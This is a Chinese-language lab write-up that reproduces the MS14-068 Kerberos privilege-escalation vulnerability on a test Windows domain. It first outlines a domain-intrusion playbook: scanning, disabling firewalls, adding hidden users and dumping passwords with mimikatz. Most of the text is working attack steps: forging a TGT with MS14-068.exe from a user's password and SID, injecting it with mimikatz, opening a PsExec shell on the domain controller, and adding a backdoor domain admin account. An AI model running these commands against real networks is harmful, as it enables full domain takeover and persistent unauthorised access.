ms14_068漏洞复现
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担
域渗透思路及攻击方式
- 进入到内网后先利用nmap等扫描工具,扫描内网主机,选择一个内网主机进行渗透
- 利用该主机开启的端口服务进行利用,一般是系统漏洞,比如ms17_010或者今天复现的ms14_068
- 通过漏洞利用后,获得终端,开启对方的远程连接服务,关闭防火墙,添加隐藏用户等,查看ip地址等相关信息,能找到域控的ip最好(一般是DNS服务器的ip地址)
- 导入猕猴桃等获取密码工具,进行密码获取,有可能存在域控管理员账号,没有则取获取下一个域控里面的主机
- 利用获取的密码,尝试远程连接域控主机,利用获取到的密码账号信息进行登录
ms14_068漏洞介绍
微软MS14-068补丁修复了Windows Kerberos允许特权提升的漏洞(CVE-2014-6324),该漏洞可能允许攻击者提升普通域用户账户为域管理员账户。攻击者可以利用这些提升的权限控制域中所有的计算机,包括域服务器。
- 影响版本
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 and Windows 8.1
Windows Server 2012 and Windows Server 2012 R2
Server Core installation option
漏洞复现
漏洞利用前提
- 域控没有打MS14-068的补丁
- 攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid
说明没有打MS14-068的补丁
用whoami /all查看本机用户sid
获取当前域控信息
Ping域控主机名,找到域控ip地址,注意ping的时候去掉主机名后面的$符号
ip为192.168.216.10
dir \WIN-73UK8HUPHDU.test.com\c$
通过dir访问域控共享文件夹,显示拒绝访问
获取域用户sid值
利用MS14-068.exe(可在GitHub下载)MS14-068.exe -u zs@test.com -p 123.com! -s S-1-5-21-22207995 55-2196234511-2875769466-1104 -d WIN-73UK8HUPHDU.test.com
执行命令后会生成一个ccache文件,这个就是我们伪造的kerberos认证证书(票据)
为了让我们生成的票据起作用,首先需要将内存中已有的kerberos票据清除,用猕猴桃清除
将生成的票据注入到内存中kerberos::ptc C:\Users\zs\Desktop\TGT_zs@test.com.ccache
再次列出域控的C盘目录
访问成功PsExec64.exe \\WIN-73UK8HUPHDU.test.com cmd
使用psexec.exe获取一个交互式shellnet user zhangsan 123.com /add /domain
添加域管理员net group "Domain admins" zhangsan /add /domain
将zhangsan这个域管理员添加到域管理组里面
我打开Windows 2008 server(域控),通过命令列出所用用户
发现多了一个zhangsan用户,并且是管理员,漏洞复现成功